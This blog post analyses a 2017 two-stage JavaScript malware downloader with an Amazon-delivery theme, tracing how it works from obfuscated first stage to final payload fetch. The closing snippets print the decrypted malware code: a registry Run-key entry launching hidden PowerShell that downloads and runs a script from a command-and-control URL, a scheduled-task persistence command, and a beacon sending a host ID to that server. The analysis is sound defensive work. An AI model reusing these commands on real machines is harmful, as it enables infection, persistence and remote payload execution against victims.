Malware - JS Downloaders: Amazon Delivery Theme | APR 2017

This is one of the more interesting JS down-loaders that I've come across recently. The fact that it downloads another script that carries out the final download of the payload is different to what we normally see. As to why exactly it is doing that, not sure. Just an extra layer.
The code in the second download is encrypted by a running XOR and is decrypted on execution. The following shots describe the flow of the campaign.

I've included the text versions of the interesting parts from the scripts, with comments, at the end of the post.

This is a screenshot of the first stage JS code - that, quite literally, downloads another JS file and then executes it to get the payload.

First Stage JS
Below is the 'beautified' version of the same code above.

First Stage Beautified


So below is the output of the selected code that I modified a bit and printed out using the 'console.log' method: 

First Stage Debugging

Executing the modified code gives us the URLs for the second-stage JS script:
First Stage execution results

The downloaded JS is saved in the USER directory and runs it:
Second Stage code

Now we go through the actual code that is executed to download the payload. Things get interesting around here. The actual code is encrypted, using a running XOR - decryption happens on execution. Once de-crypted, the code is executed and the payload is downloaded and executed. Again, I've used the console.log method to print out the de-crypted version of the code and other interesting bits following that. 

Second stage debugging

Below is a screenshot of the de-crypted code after the execution takes place - this is the code that will check a few things on the host system and execute a couple of loops and then eventually download the payload. 

Second Stage Results

Below is the code extracted after de-cryption for the second stage downloader:

Second Stage CODE

Below is the final JS code that will download the payload from the malNet:
Final JS Code


Here is the final JS code with interesting bits in comments:

Snippet #1

var ZGncoNX = new ActiveXObject('WScript.Shell');
var yiwUiaBBet = 600000;
//////CPwSorFGbw9A
//////5f2PK8sWYO22cgXwhsZX
var XvHMKvYV = "http://www.volf.de/term.php";
var xDUceoXahcbBJx0 = ZGncoNX.ExpandEnvironmentStrings('%PROCESSOR_REVISION%');

var xDUceoXahcbBJx1   = "u1"

var xDUceoXahcbBJx2 = ZGncoNX.ExpandEnvironmentStrings('%PROCESSOR_REVISION%%PROCESSOR_ARCHITECTURE%%COMPUTERNAME%%USERNAME%');
//////wK3LkavxMH
//////ffYP3PnSvRGt
WScript.Echo('x2 in this code is =' + xDUceoXahcbBJx2);
xDUceoXahcbBJx2 += xDUceoXahcbBJx;
var xDUceoXahcbBJx3 = "";
//////UP1WM4uKv
//////9SuE9DJo4Ar9knha6L
for (var xDUceoXahcbBJx4 = 0; xDUceoXahcbBJx4 < xDUceoXahcbBJx2.length; xDUceoXahcbBJx4++) {
xDUceoXahcbBJx3 += xDUceoXahcbBJx2.charCodeAt(xDUceoXahcbBJx4).toString(16);
};



/* ---------------------------
 xDUceoXahcbBJx3 - this is the ID that is sent back to the C2:
---------------------------
3436303178383657494e2d5036335533454d4835514356697368616c205468616b7572
---------------------------

 */

Snippet #2

ZGncoNX.Run('REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "' + xDUceoXahcbBJx0 + '0" /t REG_SZ /F /D "cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile(\'' + XvHMKvYV + '?cmd=d\',\'%userprofile%\\' + xDUceoXahcbBJx0 + '.js\'); %userprofile%\\' + xDUceoXahcbBJx0 + '.js"', 0, false);

/* ---------------------------
ZGncoNX.Run - OUTPUT:
---------------------------
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "46010" /t REG_SZ /F /D "cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile('http://www.volf.de/term.php?cmd=d','%userprofile%\4601.js'); %userprofile%\4601.js"
---------------------------
 */


Snippet #3

ZGncoNX.Run('REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "' + xDUceoXahcbBJx0 + '1" /t REG_SZ /F /D "%userprofile%\\' + xDUceoXahcbBJx0 + '.js"', 0, false);

/* 
---------------------------
ZGncoNX.Run
---------------------------
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "46011" /t REG_SZ /F /D "%userprofile%\4601.js"
---------------------------
 */

Snippet #4

ZGncoNX.Run('SCHTASKS /Create /TN ' + xDUceoXahcbBJx0 + ' /SC DAILY /F /TR %userprofile%\\' + xDUceoXahcbBJx0 + '.js', 0, false);

/* ---------------------------
ZGncoNX.Run
---------------------------
SCHTASKS /Create /TN 4601 /SC DAILY /F /TR %userprofile%\4601.js
---------------------------
 */

Snippet #5

This one is the XOR encrypted code:
something like this:

xDUceoXahcbBJx5.WriteText('var UDyUWGgURHBZ = "\\x3e\\x17\\x41\\x64\\x1d\\x0f\\x7e\\x45\\x6d\\x20\\x22\\x58\\x2b\\x07\\x3f\\x46\\x64\\x45\\x68\\x13\\x12\\x0c\\.......


Snippet #6

xDUceoXahcbBJx6.open('GET', XvHMKvYV + '?cmd=p&id=' + xDUceoXahcbBJx3 + '&group=' + xDUceoXahcbBJx1 + '&os=' + xDUceoXahcbBJx + '&rnd=' + Math.random(), false);
/* ---------------------------
EndResult:
---------------------------
http://www.volf.de/term.php?cmd=p&id=3436303178383657494e2d5036335533454d4835514356697368616c205468616b7572&group=u1&os=&rnd=0.06770346768653279
---------------------------

 */


That's all. 
:)

No comments:

Powered by Blogger.